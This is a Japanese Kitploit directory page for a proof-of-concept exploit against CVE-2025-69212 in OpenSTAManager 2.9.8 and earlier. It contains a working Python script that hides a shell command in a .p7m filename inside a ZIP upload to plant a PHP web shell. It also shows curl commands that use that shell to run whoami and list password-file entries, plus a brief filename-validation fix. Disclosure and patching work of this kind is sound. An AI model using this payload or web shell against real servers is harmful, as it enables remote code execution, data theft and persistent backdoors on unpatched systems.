Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
OpenSTA-Exploit — CVE-2025-69212のP7Mファイル処理に関連する概念実証(PoC) | Kitploit
ツール/GitHubGitHub/lolw0/opensta-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHublolw0/opensta-exploit

OpenSTA-Exploit

CVE-2025-69212のP7Mファイル処理に関連する概念実証(PoC)

リポジトリを見る
7日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

OpenSTA-Exploit

画像

データ詳細
CVE IDCVE-2025-69212
脆弱性スコアクリティカル (9.4)
CWE78: OSコマンドに使用される特殊要素の不適切な無効化
影響を受けるバージョンOpenSTAManager <= 2.9.8
攻撃ベクター悪意のあるファイル名を持つ .p7m ファイルを含む ZIP ファイルをアップロードする
認証必要
影響サーバー上で任意のシステムコマンドを実行する

エクスプロイトの説明

  1. cmd 変数にシェルコマンドを格納します(コマンドを実行できるPHPコードを含む SHELL.php というファイルを作成します)。
  2. cmd 変数のコマンドを隠す特別なファイル名を構築し、malicious_file 変数に保存します。
  3. exploit.zip という新しいZIPファイルを作成し、書き込み用に開きます。
  4. ZIPにファイルを追加します。そのファイル名は malicious_file 変数です。
  5. 悪意のあるファイル名が exec() コマンドに注入されます。

PoC(概念実証)

1. 注入用のzipファイルを作成

root@kitploit:~
import zipfile
import time

print("Creating zip file...")
time.sleep(1)

cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_file = f'invoice.p7m";{cmd};echo ".p7m'

with zipfile.ZipFile('exploit.zip', 'w') as zf:
    zf.writestr(malicious_file, b"")

2. ファイルを実行してアップロード

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ python3 exploit.py
Creating zip file...
lolw0@sys:~/OpenSTA-Exploit$ ls
-rw-rw-r 2 lolw0 lolw0 281 Aug 10 22:36 exploit.zip
画像

画像

3. エクスプロイトの結果

コマンド実行後にXML解析が失敗します

root@kitploit:~
HTTP/1.1 500 Internal Server Error

"error":{
"type":"Exception",
"message":"Start tag expected, '<' not found\n",
"code":0,
"file":"\/var\/www\/html\/openstamanager\/src\/Util\/XML.php",
"line":51}

3. 検証とリモートコード実行

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ curl "http://localhost:8080/files/SHELL.php?c=whoami"

www-data

lolw0@sys:~/OpenSTA-Exploit$ curl -s --get \ --data-urlencode 'c=getent passwd | grep -E "/home|/bin/bash|/bin/sh"' \
'http://localhost:8080/files/SHELL.php'

root:x:0:0:root:/root:/bin/bash
xxxx:x:1001:1001:,,,:/home/xxxx:/usr/sbin/nologin
yyyy:x:1002:1002:,,,:/home/yyyy:/usr/sbin/nologin
zzzz:x:1003:1003:,,,:/home/zzzz:/usr/sbin/nologin



結果として...


修正方法

簡単な修正方法は、処理前にファイル名を検証することです(英数字、ドット、ダッシュ、アンダースコアのみ許可し、無効なファイル名をスキップします)

root@kitploit:~
foreach ($files_xml as $xml) {
    if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
        continue; 
    }
    if (string_ends_with($xml, '.p7m')) {
        $file = XML::decodeP7M($directory.'/'.$xml);
    }
}

(または、単純にアップデートすればいい lol)

ツールをダウンロード
攻撃詳細
リモートコード実行コマンド実行によるサーバー全体の侵害
データ漏えいすべてのアプリケーションデータとデータベースへのアクセス
権限昇格Webサーバーが昇格した権限で実行されている場合や脆弱な場合に昇格の可能性
永続化バックドアをインストールし、アクセスを長期間にわたって維持
横展開ネットワーク上の他のシステム/ユーザーへの横展開